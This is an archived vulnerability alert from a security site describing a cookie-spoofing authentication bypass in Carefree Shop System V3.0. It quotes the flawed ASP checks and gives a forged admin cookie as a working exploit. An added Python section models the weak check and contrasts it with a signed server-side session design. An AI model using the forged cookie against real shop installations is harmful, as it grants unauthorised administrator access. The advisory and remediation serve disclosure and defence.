Genuine Carefree Shop System V3.0 COOKIE spoofing vulnerability - Vulnerability alert - Heiba Security Net (myhack58)

2011-01-14T00:00:00
ID MYHACK58:62201128845
Type myhack58
Reporter 佚名 (anonymous)
Modified 2011-01-14T00:00:00

Description

OK, let's begin. This is a shop system. My first idea was SQL injection, but the injection points are all filtered. So I went back and looked at the login-check file, and that is where the tragedy comes from. Vulnerable file: checkadmin.asp

<%
if request.cookies("buyok")("admin")="" then response.write "<meta http-equiv='refresh' content='0;URL=../admin.asp'>"
%>

Seeing this, you would think it is very simple: forge the COOKIE and you are straight into the back end. If it were really that simple I would not be writing this! I'll leave the suspense for everyone to try. I then went to the back end, http://127.0.0.1/admin/index.asp, and it automatically bounced me back out. I was depressed. Continue reading the code. index.asp:

<!--#include file="checkadmin.asp"-->
<HTML>
<HEAD>
<TITLE>Shop management back end</TITLE>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<LINK href="manage.css" type=text/css rel=stylesheet>
<script language='javascript'>
if (top != self) top.location.href = "index.asp";
</script>
<base target="right">
</HEAD>
<frameset rows="25,*" framespacing="0" border="0" frameborder="0">
<frame name="frame_top" src="top.asp" noresize>
<FRAMESET border=0 frameSpacing=0 frameBorder=0 cols="200,*">
<FRAME name="left" marginWidth=0 marginHeight=0 src="left.asp" noResize target="right" scrolling="auto">
<FRAME name="right" marginWidth=20 marginHeight=20 src="main.asp" noResize target="right" scrolling="yes">
</FRAMESET>
<NOFRAMES>
<body topmargin="0" leftmargin="0">
<p>This page uses frames, but your browser does not support frames.</p>
</body>
</NOFRAMES>
</frameset>
</HTML>

Seeing this I was puzzled: index.asp only includes checkadmin.asp, so why can't I get into the back end? I looked at main.asp and kept following the includes. The code is not that large, and finally I found the file. Vulnerable file: include\buyok_functions.asp. Part of the code is posted below:

set rscheck=conn.execute("select * from buyok_user where UserId='"&request.cookies("buyok")("userid")&"'")
if rscheck.eof and rscheck.bof then
    response.write "<script language='javascript'>"
    response.write "alert('sorry, you are not registered or logged in.');"
    response.write "location.href='javascript:history.go(-1)';"
    response.write "</script>"
    response.end
end if

Seeing this, everyone understands! checkadmin.asp only requires the admin sub-key of the buyok cookie to be non-empty, and buyok_functions.asp only requires that a user with the cookie's userid exists in buyok_user; neither ever checks that a login actually happened. OK, here is the EXP: the COOKIE KHWJCNQIVQNSXKMKKYHP=GVPLGBWIQTXZICBWSAALROKUCZBJDYHJMYPDEMHE; buyok=userid=1&temp=login&admin=admin; Modify the COOKIE and then go directly to http://127.0.0.1/admin/index.asp. Back end: http://localhost/admin/login.asp
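The following is an added example, not code from the advisory or from the shop system itself. It models the two checks quoted above (checkadmin.asp's non-empty admin sub-key and buyok_functions.asp's lookup by the cookie's userid) in Python, parses the classic ASP dictionary-cookie format that Request.Cookies("buyok")("admin") reads, and puts a hardened design beside them: a server-side session record created only after a successful login, referenced by an unguessable token in an HMAC-signed cookie. The names parse_asp_cookies, weak_is_admin, issue_session, hardened_is_admin, SERVER_SECRET and SESSIONS are assumptions of this example, and the forged Cookie header is the one from the EXP above, embedded as sample input.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed sample: the forged Cookie header from the advisory's EXP. The first
# cookie is an ASP session id; the second is the 'buyok' dictionary cookie.
FORGED_COOKIE_HEADER = (
    "KHWJCNQIVQNSXKMKKYHP=GVPLGBWIQTXZICBWSAALROKUCZBJDYHJMYPDEMHE; "
    "buyok=userid=1&temp=login&admin=admin"
)


def parse_asp_cookies(header: str) -> dict:
    """Parse a Cookie header into {name: {subkey: value}}.

    Classic ASP 'dictionary' cookies store sub-keys as k=v pairs joined by '&',
    which is what Request.Cookies("buyok")("admin") reads. A plain cookie with
    no sub-keys is stored under the empty sub-key "".
    """
    cookies = {}
    for part in header.split(";"):
        part = part.strip()
        if "=" not in part:
            continue
        name, _, raw = part.partition("=")
        if "=" in raw:  # dictionary cookie: userid=1&temp=login&admin=admin
            cookies[name] = {k: v[0] for k, v in parse_qs(raw, keep_blank_values=True).items()}
        else:
            cookies[name] = {"": raw}
    return cookies


def weak_is_admin(header: str) -> bool:
    """Mirrors checkadmin.asp: any non-empty 'admin' sub-key is accepted.

    The value is chosen entirely by the client, so it proves nothing.
    """
    return parse_asp_cookies(header).get("buyok", {}).get("admin", "") != ""


# --- hardened design: server-side session store plus an HMAC-signed session cookie ---

# Assumption: a real deployment loads the key from configuration, not per process.
SERVER_SECRET = secrets.token_bytes(32)
SESSIONS: dict = {}  # session token -> {"userid": ..., "is_admin": ...}


def _sign(token: str) -> str:
    return hmac.new(SERVER_SECRET, token.encode(), hashlib.sha256).hexdigest()


def issue_session(userid: int, is_admin: bool) -> str:
    """Called only after the password check succeeds; returns the Set-Cookie value."""
    token = secrets.token_urlsafe(32)  # unguessable, contains no '.'
    SESSIONS[token] = {"userid": userid, "is_admin": is_admin}
    return f"buyok_sess={token}.{_sign(token)}"


def hardened_is_admin(header: str) -> bool:
    """Admin rights come from the server-side record, never from cookie contents."""
    raw = parse_asp_cookies(header).get("buyok_sess", {}).get("", "")
    token, sep, sig = raw.rpartition(".")
    if not sep or not token:
        return False
    if not hmac.compare_digest(sig, _sign(token)):  # tampered or forged cookie
        return False
    session = SESSIONS.get(token)
    return bool(session and session["is_admin"])


if __name__ == "__main__":
    print("weak check, forged cookie:", weak_is_admin(FORGED_COOKIE_HEADER))  # True
    print("hardened check, forged cookie:", hardened_is_admin(FORGED_COOKIE_HEADER))  # False
    print("hardened check, real admin login:", hardened_is_admin(issue_session(1, True)))  # True
```

The point of the hardened version is that the cookie carries nothing the client can usefully edit: the role lives in SESSIONS on the server, the token is random rather than a user id, and the HMAC rejects any altered or fabricated value before a lookup happens. The same split (client holds only an opaque, signed reference; server holds the facts) is what the userid lookup in buyok_functions.asp lacks, since it trusts whatever id the cookie names.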

Author: wind of legend